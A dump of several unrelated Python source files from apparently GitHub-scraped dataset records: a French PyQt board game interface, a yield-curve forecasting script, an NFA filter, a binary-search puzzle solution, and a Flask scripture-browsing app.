self.a.m.mise<5 and self.deja_mise==False and (self.jeton_mise==1 or self.jeton_mise==0):\n self.deja_mise=True\n self.jeton_mise=2\n self.jeton_j2.setPixmap(self.jeton.scaled(self.jeton_j2.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.jeton_j1.setPixmap(self.c_rien)\n self.mise.acc.setText(str(self.a.liste_joueurs[0].id) + \" acceptes-tu l'augmentation de mise ?\")\n self.mise.show()\n\n\n def couleur(self, i, j):\n \"\"\"Cette méthode permet de retourner la couleur en fonction du numéro présent sur le plateau\"\"\"\n if self.p[i, j] == 1: #Les différentes couleurs\n return self.c_rouge\n if self.p[i, j] == 2:\n return self.c_vert\n if self.p[i, j] == 3:\n return self.c_jaune\n if self.p[i, j] == 4:\n return self.c_bleu\n if self.p[i, j] == 5:\n return self.c_gris\n\n if self.p[i, j] == 9 and i==0: #Le caméléon en fonction de s'il est en haut, en bas, à gauche ou à droite du plateau\n return self.cameleon_haut\n if self.p[i, j] == 9 and i==6:\n return self.cameleon_bas\n if self.p[i, j] == 9 and j==0:\n return self.cameleon_gauche\n if self.p[i, j] == 9 and j==6:\n return self.cameleon_droite\n\n if self.p[i,j]==-1: #Les coins du plateau\n return self.c_rien\n\n if self.p[i,j] ==0 and i!=0 and i!=6 and j!=0 and j!=6: #Les cases vides de l'intérieur du plateau (jeton retourné)\n return self.c_mort\n if self.p[i,j] ==0 and i==0: #Les contours du plateau\n return self.bas\n if self.p[i, j] == 0 and i==6:\n return self.haut\n if self.p[i, j] == 0 and j==0:\n return self.droite\n if self.p[i, j] == 0 and j==6:\n return self.gauche\n\n\n def type(self, num, manges):\n \"\"\"Sert à retourner ce que l'ordi à mangé. 
Utilisé dans les méthodes Plateau.un_tour_ia_facile/normale/difficile\"\"\"\n        if num == 1 and manges == 1:\n            return 'rouge'\n        if num == 2 and manges == 1:\n            return 'vert'\n        if num == 3 and manges == 1:\n            return 'jaune'\n        if num == 4 and manges == 1:\n            return 'bleu'\n        if num == 5:\n            return 'gris'\n        if num == 1 and manges != 1:\n            return 'rouges'\n        if num == 2 and manges != 1:\n            return 'verts'\n        if num == 3 and manges != 1:\n            return 'jaunes'\n        if num == 4 and manges != 1:\n            return 'bleus'\n\n\n    def actualiser_jetons(self):\n        \"\"\"Charge les images des jetons sur le plateau\"\"\"\n        for k in range(1, 50): #Les 49 QLabel du plateau 7x7 : label_1 ... label_49\n            label = getattr(self, 'label_' + str(k)) #On récupère le QLabel de la case k\n            i, j = (k - 1) // 7, (k - 1) % 7 #label_k correspond à la case (i, j) du plateau\n            label.setPixmap(self.couleur(i, j).scaled(label.size(), QtCore.Qt.IgnoreAspectRatio, QtCore.Qt.SmoothTransformation)) #On appelle la méthode PlateauUi.couleur() au-dessus pour savoir quel fichier charger ; le .scaled permet de redimensionner l'image à la taille du QLabel\n\n\n\n\nclass MiseUi(QtWidgets.QMainWindow):\n    \"\"\"Interface pour l'augmentation de mise\n    On rappelle que lorsqu'on crée un arbitre, une mise a.m est créée\"\"\"\n    def __init__(self,ui):\n        QtWidgets.QMainWindow.__init__(self)\n        QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #On importe la police pour cette classe\n        self.ui = uic.loadUi('mises.ui', self) #On charge le bon fichier\n        self.ui.accept.clicked.connect(self.accepter) #Bouton accepter\n        self.ui.refuse.clicked.connect(self.refuser) #Bouton refuser\n        self.mere=ui #Interface de type PlateauUi\n\n        palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan\n        pixmap = QtGui.QPixmap(\"fond_mise.jpg\")\n        palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n        self.setPalette(palette)\n\n        self.acc.setFont(QtGui.QFont('Jungle Roar', pointSize=10))\n\n    def accepter(self): #Si le second joueur accepte la surenchère de mise\n        self.mere.a.m.incrementer_mise() #On augmente la mise de 1\n        self.mere.affichage_mise.setText('Mise : ' + str(self.mere.a.m)) #On affiche la nouvelle valeur de mise\n        self.repaint() #On actualise l'interface\n        self.rejouer=True #On demande au joueur qui a proposé l'enchère de rejouer\n        self.close() #On ferme cette fenêtre\n\n\n    def refuser(self): #Si le second joueur refuse\n        self.annulation=True #Annulation devient True\n        if self.mere.tour_joueur==1 or self.mere.tour_joueur%2==1: #Si c'est le tour du joueur 1\n            self.mere.a.liste_joueurs[0].points+=self.mere.a.m.mise #Le joueur 2 refuse, du coup le joueur 1 gagne les points de la mise\n            if self.mere.a.m.mise >1: #On affiche le nombre de points gagnés\n                self.mere.topic.setText(str(self.mere.a.liste_joueurs[0].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' points')\n            else:\n                self.mere.topic.setText(str(self.mere.a.liste_joueurs[0].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' point')\n        if self.mere.tour_joueur%2==0: #Même chose pour le joueur 2\n            self.mere.a.liste_joueurs[1].points+=self.mere.a.m.mise\n            if self.mere.a.m.mise >1:\n                self.mere.topic.setText(str(self.mere.a.liste_joueurs[1].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' points')\n            else:\n                self.mere.topic.setText(str(self.mere.a.liste_joueurs[1].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' point')\n\n        if (self.mere.tour_joueur==1 or self.mere.tour_joueur%2==1) and (self.mere.a.liste_joueurs[0].points) >= 5: #Dans le cas où le refus entraîne la victoire du joueur 1\n            self.mere.score_j1.setText('Score : ' + str(self.mere.a.liste_joueurs[0].points)) #On actualise les scores\n            if self.mere.a.m.mise >1:\n                self.mere.topic.setText(str(self.mere.a.liste_joueurs[0].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' points')\n            else:\n                self.mere.topic.setText(str(self.mere.a.liste_joueurs[0].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' point')\n            self.mere.resultats.show() #On affiche la fenêtre résultat\n            self.mere.resultats.message.setText(str(self.mere.a.liste_joueurs[0].id) + \" gagne avec : \" + str(self.mere.a.liste_joueurs[0].points) + \" points\") #Et son nombre de points\n        elif (self.mere.tour_joueur%2==0) and (self.mere.a.liste_joueurs[1].points) >= 5: #Pareil si le refus entraîne la victoire du joueur 2\n            self.mere.score_j2.setText('Score : ' + str(self.mere.a.liste_joueurs[1].points))\n            if self.mere.a.m.mise >1:\n                
self.mere.topic.setText(str(self.mere.a.liste_joueurs[1].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' points')\n else:\n self.mere.topic.setText(str(self.mere.a.liste_joueurs[1].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' point')\n self.mere.resultats.show()\n self.mere.resultats.message.setText(str(self.mere.a.liste_joueurs[1].id) + \" gagne avec : \" + str(self.mere.a.liste_joueurs[1].points) + \" points\")\n else: #Si le refus n'entraîne pas une victoire\n self.mere.reset() #Manche suivante, on reset le plateau\n self.mere.score_j1.setText('Score : ' + str(self.mere.a.liste_joueurs[0].points)) #On actualise les scores\n self.mere.score_j2.setText('Score : ' + str(self.mere.a.liste_joueurs[1].points))\n self.mere.affichage_mise.setText('Mise : 1') #La mise est de nouveau à 1\n self.mere.deja_mise = False #Deja_mise redevient faux\n self.repaint() #Actualisation de l'interface\n self.close() #Fermeture de la fenêtre de mise\n\n\n\nclass ScoresUi(QtWidgets.QMainWindow):\n def __init__(self,ui):\n QtWidgets.QMainWindow.__init__(self)\n QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #On importe la police\n self.ui = uic.loadUi('scores.ui', self) #On charge le bon fichier d'interface\n self.ui.rejouer.clicked.connect(self.menu) #Bouton rejouer\n self.ui.quit.clicked.connect(self.quitter) #Bouton quitter\n self.message.setText(' ') #Le message est initialisé à rien\n self.message.setFont(QtGui.QFont('Jungle Roar', pointSize=16)) #Avec la nouvelle police\n self.fermer=ui #Fermer est l'interface de type PlateauUi() qu'il faudra fermer en appuyanty sur quitter ou rejouer\n\n palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan\n pixmap = QtGui.QPixmap(\"fond_scores.jpg\")\n palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n self.setPalette(palette)\n\n\n def menu(self): #Si on clique sur rejouer\n self.close() #Cette fenêtre se ferme\n JeuUi().show() #Un nouveau menu se rouvre\n self.fermer.close() #Le plateau se ferme\n if self.fermer.sauv==True: #Si c'est une partie sauvegardée qu'on fini, alors on la supprime\n try:\n os.remove('sauvegarde.txt')\n except Exception:\n pass\n mixer.music.rewind() #On remet la musique de fond au début\n\n\n def quitter(self): #Si on clique sur fermer\n self.close() #On ferme cette fenêtre\n self.fermer.close() #Et on ferme le plateau\n if self.fermer.sauv==True: #Si c'est une partie sauvegardée qu'on fini, alors on la supprime\n try:\n os.remove('sauvegarde.txt')\n except Exception:\n pass\n mixer.music.rewind() #On remet la musique de fond au début\n\n\n\nclass ReglesUi(QtWidgets.QMainWindow):\n \"\"\"Permet d'afficher l'image avec les règles du jeu\"\"\"\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #On importe la nouvelle police\n self.ui = uic.loadUi('regles.ui', self) #On charge le bon fichier d'interface\n self.ui.actionRetour_au_menu.triggered.connect(self.retour_menu) #Pour retourner au menu\n\n palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan\n pixmap = QtGui.QPixmap(\"fond_regles.jpg\")\n palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n self.setPalette(palette)\n\n\n def retour_menu(self): #Pour retourner au menu\n self.close() #On ferme la fenêtre des règles\n JeuUi().show() #Et on ouvre un nouveau menu\n\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = JeuUi() #On crée un menu que l'on appelle window\n window.show() #On 
l'ouvre\n sys.exit(app.exec_())","repo_name":"FrancoisSchmidt/Jeu_de_tong","sub_path":"ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":54214,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22447534713","text":"# This forecasts for a 3,6 and 12 months horizon. Training window is 5 years\r\n\r\nfrom AFNSGlobal.kalman_filter_functions import *\r\nfrom scipy.optimize import minimize\r\nfrom AFNSGlobal.fitted_yields_functions import *\r\nfrom AFNSGlobal.fx_functions import *\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pyswarm import pso\r\nimport time\r\n\r\nstart_time = time.time()\r\n\r\n# data import and selection\r\nrates_usd = pd.read_pickle(\"pickle_bootstrapped_usd.pickle\")\r\nrates_eur = pd.read_pickle(\"pickle_bootstrapped_eur.pickle\")\r\nrates_jpy = pd.read_pickle(\"pickle_bootstrapped_jpy.pickle\")\r\nrates_gbp = pd.read_pickle(\"pickle_bootstrapped_gbp.pickle\")\r\ndrop_list = [6, 7, 9, 10, 11, 12, 14, 16, 18]\r\nrates_usd.drop(rates_usd.columns[drop_list], axis=1, inplace=True)\r\nrates_eur.drop(rates_eur.columns[drop_list], axis=1, inplace=True)\r\nrates_jpy.drop(rates_jpy.columns[drop_list], axis=1, inplace=True)\r\nrates_gbp.drop(rates_gbp.columns[drop_list], axis=1, inplace=True)\r\nrates_dict = {\"usd\": rates_usd, \"eur\": rates_eur, \"jpy\": rates_jpy, \"gbp\": rates_gbp}\r\ntenors = np.array([1 / 12, 2 / 12, 3 / 12, 6 / 12, 1, 2, 5, 10, 15, 25])\r\ndf_fx = pd.read_pickle(\"fx_rates.pickle\")\r\n\r\ndf_fx.loc[:, \"USDEUR_1MCh\"] = -df_fx.loc[:, \"USDEUR\"].diff(-1) / df_fx.loc[:, \"USDEUR\"]\r\ndf_fx.loc[:, \"USDEUR_3MCh\"] = -df_fx.loc[:, \"USDEUR\"].diff(-3) / df_fx.loc[:, \"USDEUR\"]\r\ndf_fx.loc[:, \"USDEUR_6MCh\"] = -df_fx.loc[:, \"USDEUR\"].diff(-6) / df_fx.loc[:, \"USDEUR\"]\r\ndf_fx.loc[:, \"USDEUR_12MCh\"] = -df_fx.loc[:, \"USDEUR\"].diff(-12) / df_fx.loc[:, \"USDEUR\"]\r\ndf_fx.loc[:, \"GBPEUR_1MCh\"] = -df_fx.loc[:, \"GBPEUR\"].diff(-1) / df_fx.loc[:, \"GBPEUR\"]\r\ndf_fx.loc[:, \"GBPEUR_3MCh\"] = -df_fx.loc[:, \"GBPEUR\"].diff(-3) / df_fx.loc[:, \"GBPEUR\"]\r\ndf_fx.loc[:, \"GBPEUR_6MCh\"] = -df_fx.loc[:, \"GBPEUR\"].diff(-6) / df_fx.loc[:, \"GBPEUR\"]\r\ndf_fx.loc[:, \"GBPEUR_12MCh\"] = -df_fx.loc[:, \"GBPEUR\"].diff(-12) / df_fx.loc[:, \"GBPEUR\"]\r\ndf_fx.loc[:, \"JPYEUR_1MCh\"] = -df_fx.loc[:, \"JPYEUR\"].diff(-1) / df_fx.loc[:, \"JPYEUR\"]\r\ndf_fx.loc[:, \"JPYEUR_3MCh\"] = -df_fx.loc[:, \"JPYEUR\"].diff(-3) / df_fx.loc[:, \"JPYEUR\"]\r\ndf_fx.loc[:, \"JPYEUR_6MCh\"] = -df_fx.loc[:, \"JPYEUR\"].diff(-6) / df_fx.loc[:, \"JPYEUR\"]\r\ndf_fx.loc[:, \"JPYEUR_12MCh\"] = -df_fx.loc[:, \"JPYEUR\"].diff(-12) / df_fx.loc[:, \"JPYEUR\"]\r\n\r\nrates_dict = {\"usd\": rates_usd, \"eur\": rates_eur, \"jpy\": rates_jpy, \"gbp\": rates_gbp,\r\n \"fxusdeur\": df_fx.loc[:, ['USDEUR_1MCh', 'USDEUR_3MCh', 'USDEUR_6MCh','USDEUR_12MCh']],\r\n \"fxgbpeur\": df_fx.loc[:, ['GBPEUR_1MCh', 'GBPEUR_3MCh', 'GBPEUR_6MCh','GBPEUR_12MCh']],\r\n \"fxjpyeur\": df_fx.loc[:, ['JPYEUR_1MCh', 'JPYEUR_3MCh', 'JPYEUR_6MCh','JPYEUR_12MCh']]\r\n }\r\n\r\n#\r\niterations = 3\r\npso_maxiter = 150\r\npso_minstep = 1e-6\r\nn_swarm = 200\r\ntraining_window = 5 # numbers of years on which estimation is run\r\nsample_freq = 12\r\nforecasting_freq = 3 # forecasting frequency in months\r\ndelta_t = 1 / 12 # timedelta between observations\r\n\r\n# MINIMIZATION bounds\r\nb_sigma = (0.01, 0.1)\r\nb_theta_p = (-0.07, 0.07)\r\nb_kappa_p = (0.1, 1)\r\nb_lambda = (0.01, 1)\r\nb_sigma_obs = (0.0000001, 0.1)\r\n\r\nlbnds = 3 * 
[b_sigma[0]] + 3 * [b_theta_p[0]] + 3 * [b_kappa_p[0]] + [b_lambda[0]] + 3 * [b_sigma_obs[0]] + 2 * [\r\n b_sigma[0]] + 2 * [b_theta_p[0]] + 2 * [b_kappa_p[0]] + [b_lambda[0]]\r\nubnds = 3 * [b_sigma[1]] + 3 * [b_theta_p[1]] + 3 * [b_kappa_p[1]] + [b_lambda[1]] + 3 * [b_sigma_obs[1]] + 2 * [\r\n b_sigma[1]] + 2 * [b_theta_p[1]] + 2 * [b_kappa_p[1]] + [b_lambda[1]]\r\n\r\n# end_training_window = rates_dict[\"eur\"].index[0]+pd.DateOffset(years=training_window)\r\n\r\nlist_fc_dates = []\r\nlast_date = rates_dict[\"eur\"].iloc[-13, :].name\r\ni = 1\r\nwhile rates_dict[\"eur\"][:last_date].shape[0] > training_window * sample_freq:\r\n list_fc_dates.append(last_date)\r\n last_date = rates_dict[\"eur\"].iloc[rates_dict[\"eur\"].index.get_loc(last_date) - forecasting_freq, :].name\r\n i = i + 1\r\n\r\nlist_parameters_best = []\r\nlist_factors_best = []\r\n\r\nfor fc_date in list_fc_dates[::-1]:\r\n begin_estimation_window = fc_date + pd.DateOffset(months=-sample_freq * training_window + 1)\r\n begin_estimation_window = None\r\n print(\"Estimation Window: {} - {}\".format(begin_estimation_window, fc_date))\r\n result_columns = [\"LLH\", \"Level G\", \"Slope D\", \"Curvature D\", \"Slope F\", \"Curvature F\"]\r\n parameter_columns = [\"Sigma11G\", \"Sigma22D\", \"Sigma33D\", \"ThetaP1G\", \"ThetaP2D\", \"ThetaP3D\", \"KappaP11G\",\r\n \"KappaP22D\",\r\n \"KappaP33D\", \"LambdaD\",\r\n \"RSigmaST\", \"RSigmaMT\", \"RSigmaLT\", \"Sigma22F\", \"Sigma33F\", \"ThetaP2F\",\r\n \"ThetaP3F\", \"KappaP22F\",\r\n \"KappaP33F\", \"LambdaF\"]\r\n llh_best = np.inf\r\n\r\n curr_rates_dict = {\"eur\": rates_dict[\"eur\"].truncate(before=begin_estimation_window, after=fc_date),\r\n \"gbp\": rates_dict[\"gbp\"].truncate(before=begin_estimation_window, after=fc_date),\r\n \"fxgbpeur\": rates_dict[\"fxgbpeur\"].truncate(before=begin_estimation_window, after=fc_date)}\r\n\r\n # other arguments to transfer to kalman_afns\r\n other_args = (delta_t, tenors, curr_rates_dict, False)\r\n\r\n for i in range(iterations):\r\n res, fopt = pso(kalman_afns, args=other_args, lb=lbnds, ub=ubnds, maxiter=pso_maxiter, debug=False,\r\n swarmsize=n_swarm,\r\n minstep=pso_minstep)\r\n llh, df_factor_ts = kalman_afns(res, delta_t, tenors, curr_rates_dict, True)\r\n df_parameters = pd.DataFrame(np.reshape(res, (1, 20)), columns=parameter_columns, index=[fc_date])\r\n df_parameters = df_parameters.assign(loglh=[llh])\r\n if llh < llh_best:\r\n df_factor_ts[\"fcdate\"] = fc_date\r\n df_factor_ts.set_index('fcdate', append=True, inplace=True)\r\n df_factors_best = df_factor_ts\r\n df_parameters_best = df_parameters\r\n llh_best = llh\r\n print((i + 1) / iterations * 100, \"%\")\r\n print(\"---Elapsed time: %s seconds ---\" % (time.time() - start_time))\r\n list_factors_best.append(df_factors_best)\r\n list_parameters_best.append(df_parameters_best)\r\n print(llh_best)\r\ndf_fc_factors = pd.concat(list_factors_best)\r\ndf_fc_parameters = pd.concat(list_parameters_best)\r\ndf_fc_factors.to_pickle(\"fc_factors.pickle\")\r\ndf_fc_parameters.to_pickle(\"fc_parameters.pickle\")\r\n\r\n# slice for specific fc_date df_fc_factors.loc[(slice(None),\"2018-01-31\"),:]\r\n","repo_name":"tjdirks/afns-twoccy-ccycalib","sub_path":"AFNS-TwoCurrency-CcyCalib/AFNSGlobal/AFNS_forecasting.py","file_name":"AFNS_forecasting.py","file_ext":"py","file_size_in_byte":6412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23130399280","text":"import NFA2\nimport time\n\n\"\"\"\n A Python application to 
demonstrate the NFA2 class by\n    using it to filter the standard input stream. Those\n    lines that are accepted by NFA2 are echoed to the\n    standard output.\n\"\"\"\n\ntry:\n    s = input()\nexcept (EOFError):\n    exit()\n\nstart_time = time.time()\nwhile True:\n    NFA2.reset()\n    NFA2.process(s)\n    if NFA2.accepted():\n        print(s)\n    try:\n        s = input()\n    except (EOFError):\n        print(time.time() - start_time)\n        exit()","repo_name":"ryantillis/csc333","sub_path":"NFA - Backtrack and Bitwise/parallel-bitmap/NFA2Filter.py","file_name":"NFA2Filter.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"7252327720","text":"'''\n<Solution approach>\n1) If mid is feasible as the minimum gap, raise the search range.\n2) If it is not feasible, lower the search range.\n'''\n\ndef isPossible(between, target, n):\n    i = 0\n    while i < len(between):\n        if between[i] < target:\n            newBet = between[i]\n            while newBet < target:\n                if n <= 0 or i >= len(between)-1:\n                    return False\n                i += 1\n                newBet += between[i]\n                n -= 1\n        i += 1\n    \n    return True\n\ndef binarySearch(start, end, between, n):\n    mid = (start + end) // 2\n    result = 0\n    \n    while start < end:\n        if isPossible(between, mid, n):\n            result = max(result, mid)\n            start = mid + 1\n        else:\n            end = mid\n        \n        mid = (start + end) // 2\n    \n    return result\n\ndef solution(distance, rocks, n):\n    answer = 0\n    rocks.sort()\n    between = [rocks[0]]\n    for i in range(1, len(rocks)):\n        between.append(rocks[i] - rocks[i-1])\n    between.append(distance-rocks[-1])\n    \n    return binarySearch(0, distance, between, n)","repo_name":"iamhge/coding_test","sub_path":"Binary_search/pro_징검다리.py","file_name":"pro_징검다리.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"}
+{"seq_id":"5054624168","text":"############ NATIVE IMPORTS ###########################\n############ INSTALLED IMPORTS ###########################\nfrom flask import Flask, request, redirect\n############ LOCAL IMPORTS ###########################\nfrom utils import Tanakh,Quran,Kabbalah\nfrom html_templates.utils import (\n    format_sentences_to_be_hidden_html,\n    format_and_link_verses_for_html,\n    format_sentence_for_html,\n    list_options_html,\n    keyword_filter_dropdown\n)\n##########################################################\nQURAN = Quran()\nTANAKH = Tanakh()\nKABBALAH = Kabbalah()\nKEYWORDS = list(set(QURAN.KEYWORDS) | set(TANAKH.KEYWORDS) | set(KABBALAH.KEYWORDS))\nwith open(\"html_templates/search.html\") as html_file:\n    SEARCH_HTML = html_file.read()\nwith open(f\"html_templates/minigames/space.html\") as html_file:\n    SPACE_HTML = html_file.read()\n\napp = Flask(__name__)\n\n@app.route('/')\ndef verse_of_the_minute() -> str:\n    verse_key = QURAN.verse_name_for_now().replace(\":\",\"/\")\n    return redirect(f\"/quran/{verse_key}\")\n\n@app.route('/quran/<chapter>/<verse>')\ndef display_quranic_verse(chapter:str,verse:str) -> str:\n    verse_key = f\"{chapter}:{verse}\"\n    if verse_key not in QURAN.VERSE_NAMES:\n        return QURAN.HTML_ERROR.format(\n            verse_key=verse_key,\n            verse_in_arabic = \"أعوذُ بِٱللَّهِ مِنَ ٱلشَّيۡطَٰنِ ٱلرَّجِيمِ\",\n            verse_audio_hafs=QURAN.AUDIO.url(\"audhubillah\",reciter=0),\n            verse_audio_warsh=QURAN.AUDIO.url(\"audhubillah\",reciter=1),\n            verse_audio_hamza=QURAN.AUDIO.url(\"audhubillah\",reciter=2),\n            keyword_search = keyword_filter_dropdown(keywords=KEYWORDS),\n        )\n    next_verse_key = QURAN.get_next_verse_name(verse_key)\n    previous_verse_key = QURAN.get_previous_verse_name(verse_key)\n    VERSE_DATA = 
QURAN.get_verse_json(chapter,verse)\n    related_quran_verses = QURAN.get_crossreference_quran(VERSE_DATA, top_n=5)\n    related_quran_verses_linked = format_and_link_verses_for_html(\n        button_text=\"Qur'an\",\n        scripture=\"quran\",\n        verses=related_quran_verses[1:],\n        verses_to_display=map(\n            QURAN.get_english_summary_via_verse_name,\n            related_quran_verses[1:]\n        ),\n    )\n    related_bible_verses = QURAN.get_crossreference_bible(VERSE_DATA, top_n=5)\n    related_bible_verses_linked = format_and_link_verses_for_html(\n        button_text=\"Tanakh\",\n        scripture=\"tanakh\",\n        verses=related_bible_verses,\n        verses_to_display = map(\n            TANAKH.get_english_summary_via_verse_name,\n            related_bible_verses\n        ),\n    )\n    related_kabbalah_verses = QURAN.get_crossreference_kabbalah(VERSE_DATA, top_n=5)\n    related_kabbalah_verses_linked = format_and_link_verses_for_html(\n        button_text=\"Kabbalah\",\n        scripture=\"kabbalah\",\n        verses=related_kabbalah_verses,\n        verses_to_display = map(\n            KABBALAH.get_english_summary_via_verse_name,\n            related_kabbalah_verses\n        ),\n    )\n    chapter_name = QURAN.get_chapter_name(chapter)\n    chapter_numbers = range(1,115)\n    return QURAN.HTML.format(\n        chapter_names=list_options_html(\n            options=QURAN.CHAPTER_NAMES,\n            urls=map(\n                lambda chapter_name:f\"/quran/{QURAN.CHAPTER_NAMES.index(chapter_name)+1}/1\",\n                QURAN.CHAPTER_NAMES\n            ),\n            selected_option=chapter_name\n        ),\n        chapter_numbers=list_options_html(\n            options=map(\n                lambda number:f\"Chapter {number}\",\n                chapter_numbers\n            ),\n            urls=map(\n                lambda chapter_number:f\"/quran/{chapter_number}/1\",\n                chapter_numbers\n            ),\n            selected_option=f\"Chapter {chapter}\"\n        ),\n        verse_numbers=list_options_html(\n            options=map(\n                lambda number:f\"Verse {number}\",\n                range(1,QURAN.CHAPTER_SIZES[int(chapter)-1]+1)\n            ),\n            urls= map(\n                lambda verse_number:f\"/quran/{chapter}/{verse_number}\",\n                range(1,QURAN.CHAPTER_SIZES[int(chapter)-1]+1)\n            ),\n            selected_option=f\"Verse {verse}\"\n        ),\n        verse_audio_hafs=QURAN.AUDIO.url(verse_key,0),\n        verse_audio_warsh=QURAN.AUDIO.url(verse_key,1),\n        verse_audio_hamza=QURAN.AUDIO.url(verse_key,2),\n        verse_in_arabic=QURAN.get_arabic(VERSE_DATA),\n        verses_in_english=format_sentences_to_be_hidden_html(\n            sentences=QURAN.get_english_parallel(VERSE_DATA),\n            default_displayed=QURAN.DEFAULT_TRANSLATOR\n        ),\n        related_verses_quran=related_quran_verses_linked,\n        related_verses_tanakh=related_bible_verses_linked,\n        related_verses_kabbalah=related_kabbalah_verses_linked,\n        next_page_url = f\"/quran/{next_verse_key.replace(':','/')}\",\n        previous_page_url = f\"/quran/{previous_verse_key.replace(':','/')}\",\n        keyword_search = keyword_filter_dropdown(keywords=KEYWORDS),\n    )\n\n@app.route('/tanakh/<collection>/<book>/<chapter>/<verse>')\ndef display_tanakh_verse(collection:str,book:str,chapter:str,verse:str) -> str:\n    book_key = book.replace(\" \",\"%20\")\n    verse_key = f\"{collection}:{book_key}:{chapter}:{verse}\"\n    next_verse_key = TANAKH.get_next_verse_name(verse_key)\n    previous_verse_key = TANAKH.get_previous_verse_name(verse_key)\n    VERSE_DATA = TANAKH.get_verse_json(collection,book,chapter,verse)\n    return TANAKH.HTML.format(\n        collection = collection,\n        collection_title=collection.title(),\n        book=book.title(),\n        chapter=chapter,\n        verse=verse,\n        verse_in_english=format_sentence_for_html(TANAKH.get_english(VERSE_DATA)),\n        verse_in_hebrew=TANAKH.get_hebrew(VERSE_DATA),\n        audio_hebrew=TANAKH.AUDIO.url(collection,book_key,chapter),\n        next_page_url = f\"/tanakh/{next_verse_key.replace(':','/')}\",\n        previous_page_url = f\"/tanakh/{previous_verse_key.replace(':','/')}\",\n        keyword_search 
= keyword_filter_dropdown(keywords=KEYWORDS),\n    )\n\n@app.route('/kabbalah/<book>/<chapter>/<verse>')\ndef display_kabbalah_verse(book:str,chapter:str,verse:str) -> str:\n    book_key = book.replace(\" \",\"%20\")\n    verse_key = f\"{book_key}:{chapter}:{verse}\"\n    next_verse_key = KABBALAH.get_next_verse_name(verse_key)\n    previous_verse_key = KABBALAH.get_previous_verse_name(verse_key)\n    VERSE_DATA = KABBALAH.get_verse_json(book,chapter,verse)\n    return KABBALAH.HTML.format(\n        book=book.title(),\n        chapter=chapter,\n        verse=verse,\n        verse_in_english=format_sentence_for_html(KABBALAH.get_english(VERSE_DATA)),\n        verse_in_hebrew=KABBALAH.get_hebrew(VERSE_DATA),\n        next_page_url = f\"/kabbalah/{next_verse_key.replace(':','/')}\",\n        previous_page_url = f\"/kabbalah/{previous_verse_key.replace(':','/')}\",\n        keyword_search = keyword_filter_dropdown(keywords=KEYWORDS),\n    )\n\n@app.route('/search/<keyword>')\ndef search(keyword:str) -> str:\n    if keyword==\"naboo\":\n        return SPACE_HTML\n\n    quran_verses = []\n    if keyword in QURAN.KEYWORDS:\n        quran_verses = QURAN.KEYWORDS[keyword]\n\n    tanakh_verses = []\n    if keyword in TANAKH.KEYWORDS:\n        tanakh_verses = TANAKH.KEYWORDS[keyword]\n    \n    kabbalah_verses = []\n    if keyword in KABBALAH.KEYWORDS:\n        kabbalah_verses = KABBALAH.KEYWORDS[keyword]\n\n    return SEARCH_HTML.format(\n        keyword_search = keyword_filter_dropdown(keywords=KEYWORDS),\n        quran_verses=format_and_link_verses_for_html( \n            button_text=f\"Qur'an ({len(quran_verses)})\",\n            scripture=\"quran\",\n            verses=quran_verses,\n            verses_to_display = map(\n                lambda _:\"\",\n                quran_verses\n            ),\n        ),\n        tanakh_verses=format_and_link_verses_for_html( \n            button_text=f\"Tanakh ({len(tanakh_verses)})\", \n            scripture=\"tanakh\",\n            verses=tanakh_verses,\n            verses_to_display = map(\n                lambda _:\"\",\n                tanakh_verses\n            ),\n        ),\n        kabbalah_verses=format_and_link_verses_for_html( \n            button_text=f\"Kabbalah ({len(kabbalah_verses)})\", \n            scripture=\"kabbalah\",\n            verses=kabbalah_verses,\n            verses_to_display = map(\n                lambda _:\"\",\n                kabbalah_verses\n            ),\n        )\n    )\n    \n\nif __name__ == '__main__':\n    app.run(threaded=True, port=5000)","repo_name":"mohammedterryjack/quran","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
